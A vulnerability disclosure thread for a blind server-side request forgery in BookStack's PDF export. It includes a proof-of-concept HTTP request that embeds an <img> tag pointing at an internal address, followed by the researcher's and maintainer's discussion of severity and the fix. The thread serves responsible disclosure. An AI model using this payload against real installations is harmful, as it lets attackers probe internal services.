Server-Side Request Forgery (SSRF) in bookstackapp/bookstack

Valid

Reported on

Aug 13th 2021


✍️ Description

User with "Editor" rights can create a special book page containing <img> tag with "src" property pointing to any external or internal resource. Exporting this page using default domPdf will result in firing request from server side.

🕵️‍♂️ Proof of Concept

Updating page with malicious payload in html parameter

POST /books/<BOOK>/page/<PAGE> HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Cookie: <COOKIE>

_token=<CSRF-TOKEN>&_method=PUT&summary=&name=123&html=<img src="http://127.0.0.1:7654/test.jpg">&tags%5B0%5D%5Bname%5D=&tags%5B0%5D%5Bvalue%5D=&tags%5Brandrowid%5D%5Bname%5D=&tags%5Brandrowid%5D%5Bvalue%5D=&attachment_link_uploaded_to=1&attachment_link_name=&attachment_link_url=&template=false

Exporting page to pdf

http://<HOST>/books/<BOOK>/page/<PAGE>/export/pdf

💥 Impact

An attacker can use this vulnerability to exploit other resources in internal perimeter

Z-Old
a year ago

Admin


Hey @d3adog, I've just contacted the repo's maintainers for you. Good job!

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a year ago
bookstackapp/bookstack maintainer
a year ago

Thanks for reporting @d3adog, and thanks for contacting @zidingz,

I have had this mentioned previously by a security researcher but they considered it to be a relatively minor issue since the SSRF will be blind & image/CSS based only. Am I correct that is still the case here? Or are there more significant potential affects?

This component making image requests is expected and I'd imagine is likely utilised for the functionality in use here. Maybe we could provide some security advise around this and the option to disable external fetching?

d3addog
a year ago

Researcher


Good day, sorry for late answer. Yes ideed it is blind SSRF, but due to lack of pdf generator filtering it is possible to query any URL on any port with URL paramters regarding if it is image or not. It is required for external attacker to have significant amount of luck to find vulnerable service inside the infrastrucutre or have additional information about internal target. Due to high exploitation difficulty I consider this vulnerabilty to be of medium severity. Regarding the mitigation consider strip out the src option from tags or limiting it only to expternal resource (as I saw it during my fast recon with my installation of bookstack, there is no option to upload image using link, so this kind of fix will probably not affect user experience. Correct me if I'm wrong) Thank you, d3addog

bookstackapp/bookstack maintainer
a year ago

Thanks @d3addog for following up.

I can confirm this issue. I'll mark this as valid but I'm not sure how this platform works, I don't want to accidentally make this public until I have a patch together. It's not clear if this will be public after marking as valid or what the overall process is here.

I've got a plan to patch this in for the next release, which hopefully should be in the next couple of days. I'll be disabling any external server-side fetching by default within the export system.

bookstackapp/bookstack maintainer validated this vulnerability a year ago
d3addog has been awarded the disclosure bounty
The fix bounty is now up for grabs
bookstackapp/bookstack maintainer confirmed that a fix has been merged on bee5e2 a year ago
The fix bounty has been dropped
Jamie Slome
a year ago

Admin


CVE published! 🎉

to join this conversation